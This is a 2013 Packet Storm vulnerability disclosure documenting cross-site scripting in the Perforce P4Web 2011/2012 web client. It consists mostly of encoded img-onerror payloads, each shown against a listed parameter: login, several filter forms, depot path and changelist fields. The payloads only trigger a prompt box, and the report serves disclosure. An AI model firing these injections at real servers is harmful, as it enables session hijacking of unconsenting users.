Perforce P4web 2011 / 2012 Web Client Cross Site Scripting

2013-01-22T00:00:00
ID PACKETSTORM:119737
Type packetstorm
Reporter Christy Philip Mathew
Modified 2013-01-22T00:00:00

Description

                                        
                                            `*# Exploit Title: Perforce P4web 2011/2012 Web Client XSS Vulnerability  
# Date: 21 Jan 2013  
# Researcher: Christy Philip Mathew  
# Email: christypriory@gmail.com  
# Vendor or Software Link:  
  
http://filehost.perforce.com/perforce/r11.1/bin.ntx86/p4webinst.exe  
http://www.perforce.com/downloads/perforce/r12.1/bin.ntx86/p4webinst.exe  
  
# Version: P4Web/2011.1 & P4Web/2012.1  
# Category:: local*  
  
Perforce P4Web 2011.1 / 2012.1 has an XSS Vulnerability in its web client  
which can be actively exploited by attackers.  
  
*Perforce P4Web 2011 POC Video :* http://www.youtube.com/watch?v=NXrBBYODpPI  
  
*Perforce P4Web 2012 POC Video: *http://www.youtube.com/watch?v=69nRlTo4aT0  
  
  
*Perforce P4web 2011 POC : Live HTTP Header POST Content*  
  
1. Client Name XSS  
  
u=Administrator&p=&c=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Submit=Log+In&orgurl=  
  
2. Client Filter  
  
cnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&cdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&cda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cho=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter  
  
3. User XSS  
  
http://localhost:8080/@md=c&cd=//&cl=%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E&c=5q7@//?ac=81  
  
4. User Filter XSS  
  
unm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&udu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&uda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter  
  
  
5. Depot Tree XSS  
  
filter=147&fileFilter=matching&pattern=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&showClient=showClient&Filter=Filter  
  
6. Path XSS  
  
goField=%2F%2F%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Go=Go  
  
  
7. Branches Filter XSS  
  
bnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&bdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&bow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&bda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter  
  
8. Labels XSS  
  
lnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&ldu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&low=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&lda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter  
  
  
9. Job View XSS  
  
Filter=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=25&Show=Filter  
  
10. Jobs Filter  
  
Filter=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=10&Jsf=Job&Jsf=Status&Jsf=User&Jsf=Date&Jsf=Description&Show=Filter  
  
11. Change List Filter XSS  
  
UpToVal=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&User=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Max=50&PatVal=...+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Client=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&AllC=y&Show=Filter  
  
  
12. UserAgent XSS  
  
  
  
  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
Regard's  
  
*Christy Philip Mathew*  
Information Security Researcher  
Website:Offcon Info Security <http://www.offcon.org>  
`